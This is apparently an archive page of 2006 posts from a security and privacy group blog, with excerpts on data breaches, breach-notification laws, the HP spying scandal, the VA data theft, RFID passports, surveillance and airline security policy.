So part of Choicepoint’s settlement with the FTC was a $5m fund to compensate their victims. Now, there were 167,000 victims, of whom 800+ had their identities abused by fraudsters. None have gotten any money: Jessica Rich, assistant director of the FTC’s division of privacy and identity theft, said in a statement released to AP […]

 

International Breach Notices: The Future Is Unevenly Distributed

So said William Gibson, and it is as true in breach notices as it is anywhere else. While only 34 US states have laws requiring these notices, we see organizations around the world sending them. They resonate as the right thing. Acknowledging and apologizing for your mistakes is powerful. (Hey, someone should mention that to […]

 

Breach Tidbit

One of the things people would like to find out is how likely it is that improperly-revealed personal information will be used to commit real fraud. ID Analytics has done some research which they interpret as suggesting that even with focused attacks, where the bad guy is going after SSN and account information, the probability […]

 

Darn kids! Get off my lawn!!

“Until Solaris became open, students were only interested in Solaris for the same reason they were interested in NextStep Unix — because it was this arcane, old-fashioned thing,” said Asheesh Laroia, a graduate student in computer science at Johns Hopkins University. Via NetworkWorld.

 

Stick a fork in her…

…’cause she’s Dunn! What’s the over/under on how long Hurd lasts? Image credit: progodess

 

10-second MBA, por favor?

I have read repeatedly, most recently at Bejtlich’s blog, that with the IBM-ISS and now Secureworks/LURHQ deals, Counterpane “must” be looking to get bought out. Why? As with management consultancies, could there not be room for a boutique that does one thing really well? Help me out, here.

 

Breach Data

I just received a response to my second Freedom of Information request to the state of New York. I’ll report on this more deeply soon, but in the spirit of breach analytics week, I wanted to throw out a couple of things, based on an extremely superficial examination of the approximately 285 pages I received, […]

 

HP: The Kind of Security Theater We Like To Watch

This story just keeps getting more entertaining. “HP targeted reporters before they published.” They tried to install spyware on target’s computers, as CNET reported in “HP Spying More Elaborate Than Reported.” They engaged in physical surveillance of targets, as reported by the Washington Post in “Extensive Spying Found At HP.” And the Post reports that […]

 

CfP: 19th Annual FIRST Conference

The Forum of Incident Response and Security Teams (FIRST) has put out a call for papers for its nineteenth annual conference.  The theme for 2007 is “Private Lives and Corporate Risk: Digital Privacy – Hazards and Responsibilities”. Full details at: http://www.first.org/conference/2007/call_for_papers.html FIRST 19th Annual Conference, June 17 – 22, 2007, Melia Seville hotel, Seville, Spain […]

 

Emergent Breach Research

I talk about research and next steps, but what do I mean? We’re starting to see academics taking a serious look at the data sets we’ve accumulated here and at Attrition, and that’s awesome. I want to see more papers like: “Notification of Data Security Breaches,” by Paul M. Schwartz and Edward J. Janger, forthcoming […]

 

This Post Brought to You By The Number 3, and The Letters and S and L

There’s a fascinating discussion of the intersection of cryptanalysis, specification and flexibility, all of it stemming from yet another SSL attack by Bleichenbacher. The best posts are over at Matasano: Many RSA Signatures May Be Forgeable In OpenSSL and Elsewhere Mozilla Falls to RSA Forgery Attack RSA Signature Forgery Explained (with Nate Lawson) – Part […]

 

Because That's Where The Money is: Ethan Leib's ID Theft

Ethan Leib blogs about being the victim of a fraudster: An individual in California posing as “Ethan Leib” (with phony ID to match) has been walking into branches of my bank across the state and taking all my money — despite a fraud alert on my accounts. They even stole thousands from my 6-week old […]

 

Metricon 1.0 Papers and Digest Available

Metricon 1.0 papers and a remarkable digest are available at the security metrics web site. Dan Geer took extensive notes, and has turned them into a very useful document for those who weren’t able to make it.

 

$50 Million for Violating Driver's Privacy in Florida

$50 Million Verdict for Violating Drivers’ Privacy in FL A Florida bank was required to pay $50 million in a class-action settlement resulting from violations of federal privacy law. Fidelity Federal Bank & Trust purchased 656,600 names and addresses from the Florida DMV for use in direct marketing. The purchase violated the Drivers Privacy Protection […]

 

Does anyone remember laughter?

Via Stupid Security, I learned of a gent whose T-shirt was deemed a security risk because it showed crossed pistols and could upset passengers. He was allowed to board the plane, but only after turning his shirt inside out. Good thing he wasn’t wearing a Zeppelin shirt. I guess Bush would be OK (ironic, given […]

 

Dunn Done

See “Leak Scandal Costs HP’s Dunn Her Job.” [Update: It’s only her chairwoman job. Somehow the board members at HP don’t see action that leads to criminal investigation as all that bad. See Paul Kedrosky’s “HP Splits the Boardroom Baby,” which is an awful title for a great article. Solomon’s splitting of the baby was […]

 

HP Spying on Their Board

If you’ve not been paying attention, HP’s Chairwoman hired private investigators who lied their way to the phone records of board members and journalists. HP then lied to the SEC about why Silicon Valley eminence Tom Perkins resigned from the board, and Mr. Perkins, being a standup guy, called them on it. If you haven’t […]

 

I couldn't have said it better, myself

Pseudonymous contributor “DK”, of Josh Marshall’s blog expresses several worthy thoughts about national character with a brevity and nuance I envy: OK, I’ll admit to a bias here. I think the Netherlands is one of the best places on the planet. They have our entrepreneurial spirit, but with good taste. Like us, they have completely […]

 

Compliance for auditors?

The frequent loss of laptops and data disks by outside auditors in recent months has caused me to think about best practices for controlling auditors. The latest case involved the laptop of the auditor for Wells Fargo Bank. The laptop was stolen from the trunk of the auditor’s car and contained confidential information on bank employees. […]

 

Are they stupid, or just lying?

On the recent House of Representatives vote to ban the slaughter of horses: “It is one of the most inhumane, brutal, shady practices going on in the U.S. today,” said Rep. John Sweeney, R-N.Y., a sponsor of the ban. Sweeney argued that the slaughter of horses is different from the slaughter of cattle and chickens […]

 

Congratulations to Mozilla

EWeek has the story: Window Snyder has joined Mozilla as Security Chief. Congratulations all around. PS: Just when Window and I were gonna live in the same city, again, too. Bugger. PPS: Apparently, it’s from Mike Schroepfer’s blog post.

 

Wells Fargo to laptop-losing auditor: buh-bye

Via David Lazarus, writing about yet another lost laptop, this one belonging to an outside auditor working for Wells Fargo: “The auditor had this information because we are required by the Internal Revenue Service to have our health plans audited by independent, qualified public accountants,” said Julia Tunis, a Wells spokeswoman. “The auditor is […]

 

If I want your opinion…

…I’ll beat it out of you: President George W. Bush’s proposal for trying suspected terrorists captured overseas would allow the use of evidence obtained by coercion and let judges bar defendants from hearings where classified evidence is discussed, a Senate Republican aide who has been briefed on the plan said. Or, as Firesign Theatre put […]

 

ID Theft as a Not-For-Profit Activity

The New York Times has an article, “Some ID Theft Is Not for Profit, but to Get a Job,” about immigrants using other people’s SSNs so they can get jobs, and the impact that this has (because of the databases that run our lives): “All that was happening was that the illegal alien who had […]

 

The "Seal" that Doesn't

From this photoessay, it appears that the seal Diebold places on its electronic voting machines doesn’t do a darn thing.  It is possible to remove the card from which the thing boots, and replace it with one of your choosing, leaving no trace — the seal itself remains unchanged.  Elapsed time, a bit over four […]

 

Google whitewash

The Tom Sawyer kind, that is, known formally as Google Image Labeler: You’ll be randomly paired with a partner who’s online and using the feature. Over a 90-second period, you and your partner will be shown the same set of images and asked to provide as many labels as possible to describe each image you […]

 

Data Dilemma

Various folks at Northwestern’s Medill School of Journalism have done some great work, which they call Data Dilemma: Privacy in an Age of Security. I was led to this by various stories about the US Department of Education feeding information on financial aid applicants to the DHS for five years without bothering to inform those […]

 

Choicepoint, while we're correcting errors

A few weeks back, I corrected an error in a post about Choicepoint. Choicepoint also corrected an error, see “Job seeker loses opportunity after inaccurate background check” for details: “Well, first they said, ‘Something was wrong with your background check,’” she said. “I said, ‘What is wrong with it? What is wrong with my background […]

 

Inconceivable Levels of Destruction

There’s been a great deal of talk around the London plot about the impact of the destruction of ten airliners. Senior US officials called it inconceivable. Now, destroying 10 planes might be murder on the scale of 9/11. It would certainly be shocking and despicable. I’d like to point out that the Iraqi people can […]

 

Mangle those cell phones?

OK. Right off I am *not* advocating physical destruction of old recycled cell phones. This post (Mangle those hard drives!) at my primary security blog, ThreatChaos, got a lot of reactions when I suggested that physical destruction of hard drives was the best policy in lieu of a well managed data wiping process. That was […]

 

On Terror and Terrorism

“Is There Still a Terrorist Threat” asks Foreign Affairs. Bruce Schneier considers “What the Terrorists Want,” and also offers up a useful roundup of “Details on The British Terrorist Alert.” In that details space, Phil offers up thoughts on what a “Temporary Flight Restriction” meant to his travel. Meanwhile Kung-Fu Monkey asks “Wait, Aren’t You […]

 

Blog finds

I’ve come across some blogs I find interesting. Maybe others will, too. Statistical Modeling, Causal Inference, and Social Science Weblog of a Syrian Diplomat in America Decision Science News Social Science Data and Software (SSDS) Blog SecuritySauce (Marty “Snort” Roesch’s blog) Plus, a special bonus non-blog: UCSB’s Cylinder Preservation and Digitization Project

 

Outsiders! Insiders! Let's call the whole thing off.

I have no idea whether outsiders or insiders are responsible for more losses, and while the topic is somewhat interesting, it seems to me to be something of a marketing-generated distraction. I’ve worked in environments where I am absolutely certain that insiders were the predominant threat, in environments where they probably were, and in environments […]

 

Nasty, Poor, Brutish and Short: Somalia

Life in Somalia seems truly awful, and, like Hobbes, many are willing to turn to a very powerful government to fix it. See Ethan Zuckerman’s “Somalia Update,” which points to “The Path to Ruin” in the Economist.

 

An Odd IDology

So over at the “ID Space,” jdancu (who I assume is John) writes some responses to questions I posted to Kim Cameron’s blog. The article is “Knowledge Verification In Practice…” Kim also has a response, “Law of Minimal Disclosure or Norlin’s Maxim?” Since this is part of a continuing conversation, let me summarize by stating […]

 

Who's next?

Now that ISS has been purchased by IBM? Or is consolidation not really happening?

 

Nick Szabo is on a Roll

When I started blogging, I wanted to say one interesting and insightful thing per day. I still do, and so say several things in the hopes that one of them is interesting. Nick Szabo, on the other hand, has apparently been storing them up, and is on a roll lately: “Book consciousness,” on the effects […]

 

AOL data release fallout

AOL’s CTO has “decided to leave” the company, “effective immediately”, according to an email message sent to remaining employees by CEO Jon Miller. Additionally, CNet news reports that the researcher who posted the data, and the researcher’s supervisor (a direct report of ex-CTO Maureen Govern) have been fired.

 

Biometrics Enable Guilty Men to Go Free?

Don’t miss the picture that Jerry Fishenden paints in “biometrics: enabling guilty men to go free? Further adventures from the law of unintended consequences:” Outside, armed policemen, guard dogs and riot barriers prevent the curious crowds pushing too close. On the office rooftops – police marksmen. In the Victorian drains below the courtroom – boiler-suited […]

 

Ed Moyle is on a Roll

“Why’s Everybody Pissed at Consumer Reports?” and “Thoughts About OpenOffice” are both great posts.

 

Ruling issued in NSA wiretap case

The Permanent Injunction of the TSP requested by Plaintiffs is granted inasmuch as each of the factors required to be met to sustain such an injunction have undisputedly been met. The irreparable injury necessary to warrant injunctive relief is clear, as the First and Fourth Amendment rights of Plaintiffs are violated by the TSP. See […]

 

Birthday paradox bites FEMA

Via the SacBee: WASHINGTON (AP) – FEMA will replace locks on as many as 118,000 trailers used by Gulf Coast hurricane victims after discovering the same key could open many of the mobile homes. One locksmith cut only 50 different kinds of keys for the trailers sold to FEMA, officials said Monday. The article continues: […]

 

Clue me in?

I have to fly (from PDX to MDW) Sunday AM. Anybody flown domestically who can tell me what the real-world impact of the new rules has been in terms of delays at security? As Leslie Nielsen Lloyd Bridges might say, “I picked the wrong four days to go on vacation”. Updated: Lloyd, not Leslie. Thanks, Asteroid.

 

Marketing Points Fingers

Over at the CSO blog “Brand Loyalty Hinges On Security,” we learn that: In 2005, more than 52 million account records were reportedly stolen or misplaced, according to a study by CMO Council and Opinion Research. … “Security is what I call the 800-pound gorilla of reputation,” Jeffrey Resnick, EVP and global managing director of […]

 

Ryan Russell, A Sample Please

Over at the Open Source Vulnerability Database blog, we learn that Ryan Russell has won the “Oldest Vulnerability Contest.” It is in the interests of science that I ask how Mr. Russell was able to come from behind like this. And much as I like and respect Mr. Russell, it’s quite a last minute leap […]

 

Airline Threats: Nothing to Fear Except Fear Itself

I’m glad to hear that they caught a set of people with real plans and capabilities to carry out an act of mass murder. Too many of the recent groups arrested have fit better into the “round up some suspects” line of thinking. I don’t have a lot to add to FDR’s fine words, but […]

 

Performing Code Reviews

My co-worker Mike Howard has a really good article on “A Process for Performing Security Code Reviews” in IEEE Security & Privacy. It’s chock full of useful advice.

 

Attack of the Clones?

EKR is the voice of reason when he points out that of course RFID passports are clonable, responding to all the press brouhaha about Lukas Grunwald’s demonstration at Black Hat showing that an RFID passport can be duplicated using off the shelf parts. This outcome is hardly surprising; this is yet another side […]

 

AOL search records 'research'

Most readers will have read by now of America Online publicly releasing a large sample of search records. From the README supplied with the data: The data set includes {AnonID, Query, QueryTime, ItemRank, ClickURL}. AnonID – an anonymous user ID number. Query – the query issued by the user, case shifted with most punctuation removed. […]

 

Emerging from Network Black Holes

Sorry about the downtime. The fine folks who host this blog for us have been having hardware troubles. They’re swapping components around, and we hope it all heals up soon. Photo: Waiting to Breathe, from Stock.xchng.

 

Dear Sandman Hotel, Vancouver

Thanks for understanding that after a day and a half hiking through Garibaldi Provincial Park, all I want is a quiet room that doesn’t cost an arm and a leg, and a shower. At first I shuddered at having a room between the elevators and the ice machine, but it was quiet as a tomb. […]

 

RSS vulnerable?

Well, yeah. Of course. The perfect storm for a new wave of attacks: 1. New protocol catching on fast that involves completely trusting clients. 2. Insecure servers maintained by inexperienced sys-admins. 3. A vulnerable RSS reader tied directly to the OS. (Can you say IE7.0?) A report out of SPI Dynamics at BlackHat this week: Attackers […]

 

The butler did it

There’s a feeling you get when you watch a formulaic movie. After seeing a half-hour’s worth, you just know how it will end. You can see the decision points characters reach, and you know they’ll make the bad choice. Indeed, the very predictability of such films is what allows hilarious parodies such as Airplane! or […]

 

More thoughts on blogging

Thanks for the kind introduction Adam. This has been an interesting summer as I reach out to various security bloggers. I hope my “Meet The Bloggers” podcast series will help people to get to know the various “personalities” out there. We are an interesting bunch. The one question I have for everyone, bloggers and blog […]

 

The Down Side of "Strong" Authentication

Brad Stone has a great article in Wired about his car being stolen and the insurance company insisting that he must be lying because he still had all of his fancy RFID enabled keys. This assumption that the security system is perfect is going to continue to bite consumers especially as banks move to two-factor […]

 

Introducing Richard Stiennon

I’m pleased to introduce the Jazz Combo’s first actual rocket scientist guest blogger, Richard Stiennon. Before founding IT Harvest, a startup dedicated to re-inventing IT research, Richard worked at Gartner and PriceWaterHouseCoopers. He usually blogs at Threat Chaos, and was kind enough to feature Chris and me as his first podcast, in Meet The Security […]

 

Yet Another Coding Standard?

Over at Matasano, Tom Ptacek skewers the new CERT Secure Programming Standard by asking: Do We Need an ISO Secure Coding Standard?. The entire article is well worth reading, but it sums up nicely with this: There are already a myriad of good sources of information about secure programming, including books targeted specifically to developers […]

 

Indiana's Breach Law

Indiana’s breach notification law went into effect on July 1, 2006. An excerpt relevant to the “lost laptop” phenomenon: Sec. 2. (a) As used in this chapter, “breach of the security of the system” means unauthorized acquisition of computerized data that compromises the security, confidentiality, or integrity of personal information maintained by a state or local […]

 

It's Getting Worse All The Time?

So there’s a post over at F-Secure’s blog: There’s a growing trend here. We’ve been saying for some time that the lack of large virus outbreaks is evidence that the malware environment could be getting worse, not better. The bad guys want to make money – not make attention. So as a malware author, if […]

 

On Provable Security

Eric Rescorla writes: Koblitz and Menezes are at it again. Back in 2004, they published Another Look at “Provable Security” arguing that the reduction proofs that are de rigueur for new cryptosystems don’t add much security value. (See here for a summary.) Last week, K&M returned to the topic with Another Look at “Provable Security” […]

 

Sky Marshalls Have Suspicious Behavior Quotas?

The air marshals, whose identities are being concealed, told 7NEWS that they’re required to submit at least one report a month. If they don’t, there’s no raise, no bonus, no awards and no special assignments. Even better, the people who are “suspicious” are put into secret databases with no way to find out why their […]

 

I don't know if this or the 'White Pages' breach is worse

Via America’s Finest News Source: Postmaster General Loses Laptop; Zip-Code Data Of Millions At Risk July 25, 2006 | Issue 42•30 WASHINGTON, DC—The U.S. Postal Service has confirmed that a laptop computer issued to Postmaster General John Potter and containing the zip-code information of over 280 million Americans was allegedly left in a taxicab Monday […]

 

"Privacy" International

As mentioned by Ben Laurie; Simon Davies, the Director of Privacy International, was quoted in IT Weeks’s Will industry rescue the identity card? as saying: “I’ve believed for some months that a ‘white knight’ consortium from industry is needed,” Davies said. “Companies that can see the benefits of the ID card idea should approach the […]

 

Usable Security: SOUPS Blog posts

There are about twenty good posts talking about the Symposium on Usable Security and Privacy (SOUPS) over at Ka-Ping Yee’s Usable Security blog. If you’re reading this in the archives, start here and go forward, or here and go back. Some favorites: How will the scourge really be killed? (Panel) Decision Strategies and Susceptibility to […]

 

I smell a movement

No, not that kind, silly. I just read over at Bejtlich’s blog, that he has decided to start NoVA Sec, having been inspired by Chisec, which was begun by Matasano honcho Thomas Ptacek. ChiSec is fun, and has been rapidly imitated by other Matasano folks, yielding Seasec and NYsec (I’m hoping it will go next […]

 

Church 2.0

Check out Benjamin Sternke’s “Church 2.0: Emergence/Chaos theory.” It’s an interesting examination of how churches need to evolve to respond to a different type of parishioner: Church 2.0 will leave room for the Holy Spirit in its planning and structuring and strategizing. She’ll leave room for happy accidents to emerge. She’ll be patient with chaos, […]

 

Buggy Advice from Adam

So in the “Code Review Guidelines” which I wrote a long time back, I quote a bit of code by Peter Gutmann, on how to open a file securely. Last week, Ilja van Sprundel got in touch with me, and said that the lstat/open/fstat chain is insecure, because you can recycle inodes by creating a […]

 

ACLU: Feds snooping on Fedwire?

Press release describes a FOIA request seeking info on governmental surveillance of Fedwire, among other programs. This would be troubling. It is difficult to overstate the extent to which the Federal Reserve System values its reputation for ethical behavior and fair play. A reputation, I might add, that based on my observations it deserves.

 

Actual Data Sharing!

Cruising through my blogroll this morning over the morning coffee, I came across an article from BeyondSecurity, which walks through a forensics analysis of an on going security incident. This is a good read and it’s great to see folks in the industry talking about what they actually do and how they do it. Thanks […]

 

SMS to Email?

I’m looking for a service that will give me a US phone number capable of accepting SMS messages, and forwarding those messages to an email account. I’m happy to pay for the service, but my searches have come up blank. I don’t want a service where the user has to add the destination email manually. […]

 

Job Hunting for Security Executives

Like everyone, there comes a time in every CSO’s career where they need to look for a new job. I’ve reached that point in my career and in looking around, I’ve run into several challenges. The first problem I’ve found is that there are a lot of different titles for the person who owns all […]

 

North Carolina is in the club

From North Carolina’s breach notification law, which took effect on December 1, 2005: (f) In the event a business provides notice to more than 1,000 persons at one time pursuant to this section, the business shall notify, without unreasonable delay, the Consumer Protection Division of the Attorney General’s Office and all consumer reporting agencies that […]

 

Choicepoint Spins off 3 Businesses

From their press release: ALPHARETTA, Ga., July 10 /PRNewswire-FirstCall/ — ChoicePoint (NYSE: CPS – News) today announced its intent to divest various businesses resulting from its company-wide strategic review. The previously disclosed review process resulted in the company adopting a new strategic focus on helping customers manage economic or physical risks, as well as the […]

 

CSI/FBI Survey considered harmful

The latest 2006 CSI-FBI Computer Crime and Security Survey has been released. Already, it is making waves, as it does each year. I want to simply state that there is no reason to give this survey any credence. The survey instrument is sent only to CSI members. This time, it was sent to 5,000 of […]

 

In every dream home, a heartache

Barry Ritholtz, an NYC hedge fund manager, blogs about a WSJ story. The gist: On Sept. 21, 2001, rescuers dug through the smoldering remains of the World Trade Center. Across town, families buried two firefighters found a week earlier. At Fort Drum, on the edge of New York’s Adirondacks, soldiers readied for deployment halfway across […]

 

Skype reverse-engineered?

According to Charlie Paglee, Skype has been cracked, and a compatible client implemented. This promises to have wide ramifications, about which Charlie writes at length.

 

ThreatChaos Podcast Featuring Emergent Chaos

This week marks the first installment of a series of podcasts I am producing called “Meet The Security Bloggers”. I asked Adam Shostack and Chris Walsh to be the guinea pigs for the first one and it turned out really well. These guys write for EmergentChaos, a blog that Adam started. When he got it […]

 

Belated happy birthday

…to the United States’ Freedom of Information Act, a national law signed on July 4, 1966, by a reluctant Lyndon Johnson, after having been championed by U.S. Representative John Moss.

 

Debian CVS server compromised

Here’s news of a breach that (I presume) involved no PII, but which could be significant. I wrote about a previous Debian breach back in December, 2003. I hadn’t realized it had been so long! Update: Local vuln used to elevate privs. Local access gained due to weak developer password. Details here.

 

Spying As a "Lifestyle Choice"

“The Plot to Hijack Your Computer” in Business Week lays out some of the history of “Direct Revenue,” a spyware company whose products are so beloved of their customers that DR receives regular death threats. Cryptome presents an excerpt from a complaint in a lawsuit against AT&T, claiming that “NSA/AT&T Spying Began 8 Months before […]

 

Bye, Syd

Syd Barrett has died.

 

Enforcement

People whine about Sarbanes-Oxley as if it were government accountants with a sense of neither humor nor proportion watching everything an executive does, 24/7. Thing is, much of the actual regulation is courtesy of the Public Company Accounting Oversight Board, a private corporation. My hat is off to the accounting profession, which successfully met an […]

 

Chivalry isn't dead

Regarding the theft of Coca Cola intellectual property and its attempted sale to arch-rival Pepsico, we learn PepsiCo was offered a new product sample and confidential documents in May, in a letter from someone calling himself ‘Dirk’. But instead of taking the bait it tipped off Coca-Cola, which brought in the FBI. […] Coca-Cola’s chairman […]

 

In Congress Assembled, July 4, 1776

In CONGRESS, July 4, 1776 The unanimous Declaration of the thirteen united States of America, When in the Course of human events, it becomes necessary for one people to dissolve the political bands which have connected them with another, and to assume among the powers of the earth, the separate and equal station to which […]

 

Sorry for not posting this earlier…

…but my internet tube was flooded. If you want to know what the heck that means, the good folks at 27B Stroke 6 (easily the best blog name I’ve seen this year), provide the details. The short and sweet is that U.S. senator Ted Stevens ain’t exactly Vint Cerf: I just the other day got, […]

 

Flippin' sweet!

Maybe IBM does have a sense of humor. “Knock it off, Napoleon! Just make yourself a dang quesa-dilluh!”. This phrase, from the movie Napoleon Dynamite, is the cipher key IBM are using to publish encrypted XML at this year’s Wimbledon grand slam. But is this a rather glaring lapse in security, or simply an anticipatory […]

 

Questions about 'Ignoring The "Great Firewall of China"'

Later today at the Privacy Enhancing Technologies workshop, Richard Clayton will be presenting a talk on “Ignoring the Great Firewall of China.” I’ll be the ‘session chair’ for the session, which usually means I make sure the speaker is in the room, has some slides on a computer, and knows how much time they […]

 

Indistinguishable from magic

The press release you won’t see. For Immediate Release CATAWBA COUNTY SCHOOL SYSTEM, June 26 — The Catawba County Public School System (NC) announced today that district web site administrators have remedied a configuration error which accidentally resulted in the social security numbers and names of several hundred students being made available via the popular […]

 

Breach Roundup: 6/17 – 6/24

This week’s roundup is large. Rather than push other newish posts off the bottom of most people’s screens, it has been deemed preferable to prepend this introductory paragraph, at the bottom of which readers may elect to see more.

 

Gartner to Google: Learn to read minds

Concerning a school district which misconfigured its web server and wound up posting student social security numbers for all — including Google’s spiders — to see, Gartner’s Avivah Litan weighs in: They say the Internet is free and open, and you can’t stop them,” Litan said. “But they ought to scrutinize some of the content […]

 

SWIFT spies

The United States Treasury Department has had secret access to records maintained as part of the SWIFT system, which it has been using secretly for years to identify financial ties to terrorist entities. The Washington Post has more.

 

The FBI's Use of Data Brokers

Although the federal government and local law enforcement agencies nationwide use private data brokers, the FBI said that practices used by these companies to gather private phone records without warrants or subpoenas is illegal, according to an Associated Press article on Chron.com. A senior FBI lawyer, Elaine N. Lammert, told lawmakers the bureau was still […]

 

Background Checks for Chemists, Too?

Is something a little off balance when we background check people trying to learn about computer security, but not chemists or nucular physicists?

 

Metricon: The Agenda

Andrew Jaquith has posted the Metricon Agenda. We had a lot of good papers, and couldn’t accept them all. (We’ll provide, umm, numbers, at the workshop.) If you’ve submitted a paper, you should have heard back by now. Thanks to all the submitters, and we look forward to seeing you at the workshop.

 

Men Without Pants

To protect the rights of the official beer they were denied entry, so the male fans promptly removed the trousers and watched the game in underpants. The BBC asserts that up to 1,000 fans were told to strip off their orange pants in “Fans Lose Trousers to Gain Entry.” Markus Siegler, the control-freak in charge […]

 

Remembering the Maine

From Maine’s Public Law, Chapter 583, passed April 2006: Sec. 9. 10 MRSA §1348, sub-§5, as enacted by PL 2005, c. 379, §1 and affected by §4, is amended to read: 5 . Notification to state regulators. When notice of a breach of the security of the system is required under subsection 1, the information […]

 

Breach Roundup

Expedia/Ernst & Young, 250,000 CC, Lost Laptop. Ed Hasbrouck has a great analysis of Expedia’s privacy policy at “Expedia auditors lose laptop with customer credit card numbers.” Japanese Telco KDDI, 4million names, address, phone numbers, mechanism unknown. “KDDI Suffers Massive Data Leak.” Why is a Japanese telco owning up? New expectations. AIG (American Insurance Group), […]

 

Breach Quickies

Well, now that America’s Finest News Source is getting into breach coverage, I guess I can move on. See “Hotels.com Information Stolen” in the Onion. Also, Nick Owen has some good analysis of the Ohio State comedy of errors in “Repurcussions of data loss at Ohio University.” I’m hoping Chris will cover the N+1 Ohio […]

 

Dear News Media,

Recently, you had a very interesting story on your web site. I left a browser tab open, so I could read it on the plane. But your very interesting story meta-refreshed itself so you could serve me more ads. Then the airport’s wireless portal showed up, and it stopped refreshing. And I couldn’t read your […]

 

Boycott Sivacracy!

I have a proposal for all British and American faculty who care about global justice: Please boycott me. Siva Vaidhyanathan asks that we boycott him in “A Modest Proposal: Boycott me.” I think it’s the best response I’ve seen to the British boycott of Israeli academics.

 

80% of Active Duty Military, 2.2 million SSNs

Social Security numbers and other personal information for as many as 2.2 million U.S. military personnel — including nearly 80 percent of the active-duty force — were among the data stolen from the home of a Department of Veterans Affairs analyst last month, federal officials said yesterday, raising concerns about national security as well as […]

 

Is encryption worth it?

Gartner’s Avivah Litan says it’s better to spend money on encryption than on cleaning up after a data breach, according to a news report on her recent testimony before the US Senate. The problem? Gartner’s method in researching this claim, as best I can tell, relies on looking at a few high-profile cases. Sure, if […]

 

Breach Roundup

Where two organizations are implicated, the first is the one which collected the data, the second is Ernst and Young the one that lost it. Texas Guaranteed Student Loan/Hummingbird, 1.3m SSNs, “lost equipment.” “Toronto firm at centre of security breach” Hotels.com/Ernst and Young, 243,000 credit cards, lost laptop. “Hotels.com customer info may be at risk” […]

 

Jurisdiction as Property

Nick Szabo has a fascinating article on “Jurisdiction as property and peer-to-peer government.” I’m not going to attempt to summarize it, but will simply quote the opening: Modern civics and political science is often taught as an absurd dichotomy: that government is a “monopoly over the use of force” and that the absence of government […]

 

ID Theft and the 18-24 Set

Matt Rose has an interesting post, “What is Higher Education’s Role in Regards to ID Theft?:” A recent study by the US Justice Department notes that households headed by individuals between the ages of 18 and 24 are the most likely to experience identity theft. The report does not investigate why this age group is […]

 

EU Courts Rule Against PNR Sharing with USA

The European Court has ruled the US/EU treaty on data sharing around air travelers is not legal. (I’m not saying “about air travelers” because I read Ed Hasbrouck, and thus know that PNRs contain data on more than just the travelers.) That’s not why I’m posting. I’m posting because of this choice quote from the […]

 

Words of Wisdom

We live in a society of laws. Why do you think I took you to all those “Police Academy” movies? For fun? Well, I didn’t hear anybody laughin’, did you? — Homer Simpson Marge Be Not Proud

 

(Adam In Seattle)

I’m in Seattle this week for some work-related stuff, and have some free evenings. If you’re in Seattle and would like to get together, drop me a note.

 

Maybe they can borrow a few million from the IRS

[T]he VA’s inspector general, George Opfer, said that the agency had been unable to formally notify the affected veterans because “we don’t have 26 million envelopes.” via the Bradenton Herald Now that the funny part is out of the way… Asked the cost for preventing and covering potential losses from identity theft, [VA Secretary] Nicholson […]

 

Illinois credit freeze now law

Public Law 094-0799 now allows Illinois residents to have a freeze applied to their credit reports. The maximum fee (not applicable to those 65 and over) is $10.00. The law, according to a press release from the governor’s office, takes effect January 1, 2006. Look for other states to continue to pile on, now that […]

 

A small, but hopeful sign in state breach legislation

A bill sits on Illinois governor Rod Blagojevich’s desk. If he signs it, Illinois will take a step toward meaningful central reporting of breach notifications: (815 ILCS 530/25 new) Sec. 25. Annual reporting. Any State agency that collects personal data and has had a breach of security of the system data […]

 

Never say die?

I’m not sure what to expect out of this story of a guy who, left behind in a crazed state and presumed to have died, overnighted above 8000 meters on Everest and was found alive the next day, prompting a rescue effort expected to take three days. (Note that this is a different climber from […]

 

Make that 12% of Adults

Rob Lemos convinces me that the better number is “One in 8 (or 9) Americans.” I buy his statement as long as we discuss adults, rather than Americans. Kids are at risk from ID theft, too, even if this incident doesn’t touch them. (Assuming none of the vets has an overlapping SSN, a stolen SSN, […]

 

"Encryption is hard, let's go shopping!"

On upcoming changes to the Payment Card Industry Data Security Standard: “Today, the requirement is to make all information unreadable wherever it is stored,” Maxwell said. But this encryption requirement is causing so much trouble for merchants that credit card companies are having trouble dealing with requests for alternative measures, he said. In response, changes […]

 

Blogrolling Kim Cameron

I’ve added Kim Cameron’s Identity Blog to the blogroll. There’s a great post “Inebriation and the Laws of Identity” about what happens to you when you’re not firm and resolved about when you hand over your ID. Hint to Paul Toal: The data is used for fraud prevention, and will stay in their databases forever. […]

 

The Human Element

In one of the soon-to-be countless articles about the VA Incident, Network World’s Ellen Messmer writes: The sad irony in all this is that there are many at the VA who have worked hard to design and install network-based security. But in the “multiple layers of security” everyone is so fond of discussing, the human […]

 

Restaurant Recommendation: Queen Sheba, Seattle

Not only was the Ethiopian food at Queen Sheba quite good, but when I went back, they had my jacket, and my somewhat expensive camera was still in the pocket. Doubly recommended. Queen Sheba is at 916 East John St, a block from Broadway, 206-322-0852. Thanks to W. for introducing me. [Updated to fix spelling. […]

 

Personal Data on 26,500,000 Veterans Stolen (Including SSNs)

Personal data, including Social Security numbers of 26.5 million U.S. veterans, was stolen from a Veterans Affairs employee this month after he took the information home without authorization, the department said Monday. The material represents personal data of all living veterans who served and have been discharged since 1976, according to the department. The information […]

 

911 Dispatcher Kills Woman by Abusing Database

An emotionally disturbed 911 emergency dispatcher abused his access to the call center’s databases while tracking his ex-girlfriend and her new boyfriend before murdering both of them. See Declan McCullagh, “Police Blotter: 911 dispatcher misuses database, kills ex-girlfriend,” which covers the court case stemming from a 2003 shooting, described in “Job loss tied to fatal […]

 

Breach round-up

Ohio University I: On Friday, April 21, the FBI advised the Technology Transfer Department at Ohio University’s Innovation Center that a server containing office files had been compromised. Data on the server included e-mails, patent and intellectual property files, and 35 Social Security numbers associated with parking passes. Ohio University II: 300,000 alums and friends. […]

 

Homeland Security Privacy Office Slams RFID

Via Kim Cameron (“Homeland Security Privacy Office Slams RFID Technology“), I read about “The Use of RFID for Human Identification.” This is an important report. The money quote is useful because it comes out of DHS: Against these small incremental benefits of RFID are arrayed a large number of privacy concerns. RFID deployments’ digitally communicated […]

 

President Bush Calls for National ID Card

[Bush] also proposed to cut back on potential fraud by creating an identification card system for foreign workers that would include digitized fingerprints. He said that a tamperproof identification card for workers would “leave employers with no excuse” for violating the law. Of course, that means the rest of us will need the cards, too, […]

 

The Internet Channel, at Risk

Lack of trust in online banking among U.S. consumers is a serious constraint because of doubts about banks’ security measures, according to eMarketer’s new report, “Online Banking: Remote Channels, Remote Relationships?” The result is a slowing rate of adoption, with online banking households increasing by only 3.1% in the last quarter of 2005 — the […]

 

